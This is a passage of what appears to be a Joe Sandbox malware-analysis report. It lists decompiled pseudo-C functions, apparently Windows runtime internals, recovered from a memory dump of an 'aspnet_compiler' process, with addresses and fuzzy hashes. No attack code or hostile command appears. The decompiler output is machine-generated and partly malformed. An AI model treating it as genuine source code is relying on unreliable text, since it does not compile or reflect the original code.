				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						L018976E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L018A4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                  0x018bfd9b
                                                  0x018bfda0
                                                  0x018bfda1
                                                  0x018bfdab
                                                  0x018bfdad
                                                  0x018bfdb0
                                                  0x018bfdb8
                                                  0x018bfe0f
                                                  0x018bfde6
                                                  0x018bfde9
                                                  0x018bfdec
                                                  0x018fc0c0
                                                  0x018bfdfe
                                                  0x018bfe06
                                                  0x018bfe06
                                                  0x018fc0c8
                                                  0x018bfe2d
                                                  0x018bfe2d
                                                  0x00000000
                                                  0x018bfe2d
                                                  0x018fc0d1
                                                  0x018fc0e0
                                                  0x018fc0e5
                                                  0x018fc0e5
                                                  0x018fc0e8
                                                  0x00000000
                                                  0x018fc0e8
                                                  0x018bfdf4
                                                  0x00000000
                                                  0x00000000
                                                  0x018bfdf6
                                                  0x018bfdfa
                                                  0x018bfe1a
                                                  0x018bfe1f
                                                  0x018bfe1f
                                                  0x018bfdfc
                                                  0x00000000
                                                  0x018bfdfc
                                                  0x018bfdcc
                                                  0x018bfdd0
                                                  0x018bfe26
                                                  0x00000000
                                                  0x018bfe26
                                                  0x018bfdd8
                                                  0x018bfddb
                                                  0x018bfddd
                                                  0x018bfde0
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                  • Instruction ID: 85b8490a0189850ccd17a913b7c2bbbf55f0847575b13993faefc2d27cb58b8a
                                                  • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                  • Instruction Fuzzy Hash: 48217C72600645DBD735CF0DC980EA6BBE5EB94B10F28816EEA55CB711D7309E00CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018BB390 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 54%
                                                  			E018BB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E018A2280(_t12, 0x1978608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E018C00C2(0x1978608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                  0x018bb395
                                                  0x018bb3a2
                                                  0x018bb3a5
                                                  0x018bb3aa
                                                  0x018bb3b2
                                                  0x018bb3ba
                                                  0x018bb3bd
                                                  0x018bb3c0
                                                  0x018bb3c4
                                                  0x018bb3c9
                                                  0x018fa3e9
                                                  0x018fa3ed
                                                  0x018fa3f0
                                                  0x018fa3ff
                                                  0x018fa403
                                                  0x018fa409
                                                  0x00000000
                                                  0x00000000
                                                  0x018fa40b
                                                  0x018fa40b
                                                  0x018fa40f
                                                  0x018fa415
                                                  0x018fa423
                                                  0x018fa423
                                                  0x018fa415
                                                  0x018bb3d1
                                                  0x018bb3e8
                                                  0x018bb3e8
                                                  0x018bb3d9

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e97ef3ffe9674d9b4431acd72b8ab589f3428efc976ec5cc31a2b533f764b08
                                                  • Instruction ID: 74003726cf7b3c70344096122785af88b9181b219451d7e2cbd5a453fcc024d2
                                                  • Opcode Fuzzy Hash: 3e97ef3ffe9674d9b4431acd72b8ab589f3428efc976ec5cc31a2b533f764b08
                                                  • Instruction Fuzzy Hash: 2A116B373162149BCB298A188DC1A6BB397EFC9730B29412DDE1AC7380C9329E06C691
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01889240 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E01889240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x195f708);
				E018DD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E018C95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E018C95D0();
				_t33 =  *0x19784c4; // 0x0
				L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x19784c4; // 0x0
				L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x19784c4; // 0x0
				E018A2280(L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x19786b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E018C95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E018C95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E01889325();
					_t50 =  *0x19784c4; // 0x0
					return E018DD0D1(L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                  0x01889240
                                                  0x01889242
                                                  0x01889247
                                                  0x0188924c
                                                  0x0188924e
                                                  0x01889255
                                                  0x01889257
                                                  0x0188925a
                                                  0x0188925f
                                                  0x0188925f
                                                  0x01889266
                                                  0x01889271
                                                  0x01889276
                                                  0x01889279
                                                  0x0188927e
                                                  0x01889295
                                                  0x0188929a
                                                  0x018892b1
                                                  0x018892b6
                                                  0x018892d7
                                                  0x018892dc
                                                  0x018892e0
                                                  0x018892e6
                                                  0x018892e8
                                                  0x018892ee
                                                  0x01889332
                                                  0x01889333
                                                  0x01889337
                                                  0x01889338
                                                  0x0188933a
                                                  0x0188933a
                                                  0x0188933d
                                                  0x01889342
                                                  0x01889342
                                                  0x01889345
                                                  0x01889349
                                                  0x0188934e
                                                  0x01889352
                                                  0x01889357
                                                  0x018892f4
                                                  0x018892f4
                                                  0x018892f6
                                                  0x018892f9
                                                  0x01889300
                                                  0x01889306
                                                  0x01889324
                                                  0x01889324

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2fe8f1eb19eb581beb9a821b804c94605ade04ecb5985d67a3c8cdef8e3e3a4d
                                                  • Instruction ID: 1ebe5c56cf7075e826fb8842ac253aeaedb35bfef8b953bf5533cbbcc3495466
                                                  • Opcode Fuzzy Hash: 2fe8f1eb19eb581beb9a821b804c94605ade04ecb5985d67a3c8cdef8e3e3a4d
                                                  • Instruction Fuzzy Hash: 50215C32440602DFC722EF6CCA04F25B7B9BF68708F14456CE009C66A1C775EA41DB45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01914257 Relevance: .1, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 90%
                                                  			E01914257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x19608d0);
				E018DD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E019141E8(__ebx, __edi, __ecx, _t39);
				L0189EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x19787e4;
					_t18 =  *0x19787e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1975cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x19787e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x19787e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L01887055(_t31 + 0xfffffff8);
								_t24 =  *0x19787e0; // 0x0
								_t18 = _t24 - 1;
								 *0x19787e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1975cd0;
				if( *0x1975cd0 <= 0) {
					L01887055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x19787e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x19787e8 = _t30;
						 *0x19787e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E018DD0D1(L01914320());
			}















                                                  0x01914257
                                                  0x01914257
                                                  0x01914257
                                                  0x01914259
                                                  0x0191425e
                                                  0x01914263
                                                  0x01914265
                                                  0x01914273
                                                  0x01914278
                                                  0x0191427c
                                                  0x0191427f
                                                  0x01914281
                                                  0x01914287
                                                  0x019142d7
                                                  0x019142d7
                                                  0x019142da
                                                  0x0191428d
                                                  0x0191428d
                                                  0x0191428f
                                                  0x01914292
                                                  0x01914297
                                                  0x0191429c
                                                  0x019142a0
                                                  0x019142a6
                                                  0x019142a8
                                                  0x019142ae
                                                  0x019142b3
                                                  0x00000000
                                                  0x019142ba
                                                  0x019142ba
                                                  0x019142bf
                                                  0x019142c5
                                                  0x019142ca
                                                  0x019142cf
                                                  0x019142d0
                                                  0x00000000
                                                  0x019142d0
                                                  0x019142b3
                                                  0x00000000
                                                  0x019142a6
                                                  0x0191429c
                                                  0x019142dc
                                                  0x019142dc
                                                  0x019142e3
                                                  0x01914309
                                                  0x019142e5
                                                  0x019142e5
                                                  0x019142e8
                                                  0x019142ee
                                                  0x019142f0
                                                  0x00000000
                                                  0x019142f2
                                                  0x019142f2
                                                  0x019142f4
                                                  0x019142f7
                                                  0x019142f9
                                                  0x01914300
                                                  0x01914300
                                                  0x019142f0
                                                  0x0191430e
                                                  0x0191431f

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6fdb80aa608a3d2da9c1d0756e66bea29bf4c7efe20d24b0ad6e0709653ef56c
                                                  • Instruction ID: 7675b76ba0701069a06da2521e757e14b5de12ec5dbff5adcc0d1f2a98e0d14a
                                                  • Opcode Fuzzy Hash: 6fdb80aa608a3d2da9c1d0756e66bea29bf4c7efe20d24b0ad6e0709653ef56c
                                                  • Instruction Fuzzy Hash: F6219A70500746CFC726DF68D504A54BBF5FF89716F24866EC10ACB699DB3189D2CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018B2397 Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 25%
                                                  			E018B2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x197848c != 0) {
					L018AFAD0(0x1978610);
					if( *0x197848c == 0) {
						E018AFA00(0x1978610, _t19, _t27, 0x1978610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E018B2581(0x1978610, 0x18650a0, _t26, _t27, _t28);
						E018AFA00(0x1978610, 0x18650a0, _t27, 0x1978610);
					}
				} else {
					L1:
					_t11 =  *0x1978614; // 0x0
					if(_t11 == 0) {
						_t11 = E018C4886(0x1861088, 1, 0x1978614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E018B2581(0x1978610, (_t11 << 4) + 0x1865070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                  0x018b23b0
                                                  0x018b23b6
                                                  0x018b2409
                                                  0x018b2415
                                                  0x018f5ae9
                                                  0x00000000
                                                  0x018b241b
                                                  0x018b241b
                                                  0x018b241d
                                                  0x018b2427
                                                  0x018b242e
                                                  0x018b2430
                                                  0x018b2430
                                                  0x018b23b8
                                                  0x018b23b8
                                                  0x018b23b8
                                                  0x018b23bf
                                                  0x018b23fc
                                                  0x018b23fc
                                                  0x018b23c1
                                                  0x018b23c3
                                                  0x018b23d0
                                                  0x018b23d8
                                                  0x018b23d8
                                                  0x018b23dc
                                                  0x018b23de
                                                  0x018b23e1
                                                  0x018b23e1
                                                  0x018b23ec

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d1dde4eeec404249963f562c4bd296e3e05100c151c29c34d6cab356a650b0fa
                                                  • Instruction ID: 07020dc2c6d2f8828d9b60e194c37c3c3e0b131c3460b5327870e452902f63ed
                                                  • Opcode Fuzzy Hash: d1dde4eeec404249963f562c4bd296e3e05100c151c29c34d6cab356a650b0fa
                                                  • Instruction Fuzzy Hash: 1811663170430167E730A62D9CC4B9AB6CEFFA4B60F14402AF702DB3A1C6B4FA05875A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0188C962 Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 42%
                                                  			E0188C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x197d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					L0189EEF0(0x19770a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(L0190F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0189EB70(_t29, 0x19770a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return L018CB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0190F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x19770c0; // 0x0
					while(_t38 != 0x19770c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x197b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                  0x0188c96a
                                                  0x0188c974
                                                  0x0188c988
                                                  0x0188c98a
                                                  0x018f7c9d
                                                  0x018f7c9f
                                                  0x018f7ca4
                                                  0x018f7cae
                                                  0x018f7cf0
                                                  0x018f7cf5
                                                  0x018f7cfa
                                                  0x0188c992
                                                  0x0188c996
                                                  0x0188c997
                                                  0x0188c998
                                                  0x0188c9a3
                                                  0x0188c9a3
                                                  0x018f7cb0
                                                  0x018f7cb7
                                                  0x018f7cbb
                                                  0x00000000
                                                  0x00000000
                                                  0x018f7cbd
                                                  0x018f7ce8
                                                  0x018f7cc5
                                                  0x018f7cc8
                                                  0x018f7cca
                                                  0x018f7cd0
                                                  0x018f7cd6
                                                  0x018f7cde
                                                  0x018f7ce4
                                                  0x018f7ce4
                                                  0x018f7cd0
                                                  0x00000000
                                                  0x018f7ce8
                                                  0x0188c990
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e00f2cfd4ad1cd5cbdffd49cb9f6745d20784f2f4c7f462fb78af87a91be977d
                                                  • Instruction ID: 5c9649d5e65440cfa0e9ce4750642a03b05e48237aa33f700a362bc89b0019fb
                                                  • Opcode Fuzzy Hash: e00f2cfd4ad1cd5cbdffd49cb9f6745d20784f2f4c7f462fb78af87a91be977d
                                                  • Instruction Fuzzy Hash: E911E1313006469FDB66AF7CDC85A6BBBE5BF84714B00052CEA46D3651DB20EE14C7D1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018B002D Relevance: .1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E018B002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = L018A7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(L018A7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(L018A7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(L018A7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                  0x018b0032
                                                  0x018b0037
                                                  0x018b0043
                                                  0x018f4b3a
                                                  0x018b0049
                                                  0x018b0049
                                                  0x018b0049
                                                  0x018b004e
                                                  0x018b0053
                                                  0x018f4b48
                                                  0x018f4b5a
                                                  0x018f4b4a
                                                  0x018f4b53
                                                  0x018f4b53
                                                  0x018f4b5f
                                                  0x00000000
                                                  0x018f4b61
                                                  0x00000000
                                                  0x018f4b61
                                                  0x018b0059
                                                  0x018b0059
                                                  0x018b0060
                                                  0x018f4b6f
                                                  0x018f4b6f
                                                  0x018b0069
                                                  0x018f4b83
                                                  0x00000000
                                                  0x00000000
                                                  0x018f4b90
                                                  0x018f4b9b
                                                  0x018f4b9b
                                                  0x018f4ba4
                                                  0x00000000
                                                  0x00000000
                                                  0x018f4baa
                                                  0x00000000
                                                  0x018b006f
                                                  0x018b006f
                                                  0x00000000
                                                  0x018b006f
                                                  0x018b0069

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                  • Instruction ID: 91d64e84b367181ec4d4a7cfc115040e9b3e699dec4b0bfef674dcd67ceda681
                                                  • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                  • Instruction Fuzzy Hash: CD11C8326066C98FE7239BACC584B777BE4AF41758F0900A5EE04C7793D729DB42C651
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01889080 Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E01889080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x19785ec;
				E018A2280(_t48, 0x19785ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return L0189FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x197538c; // 0x773b6828
					if( *_t84 != 0x1975388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x195f6e8);
						E018DD0E8(0x19785ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E019588F5(_t80, _t85, 0x1975388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x19786c0; // 0x14207b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x19786b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E018A2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E019588F5(0x19785ec, _t85, 0x1975388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												L018CAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x197b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x19784c0;
																			if(_t82 >=  *0x19784c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01959063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
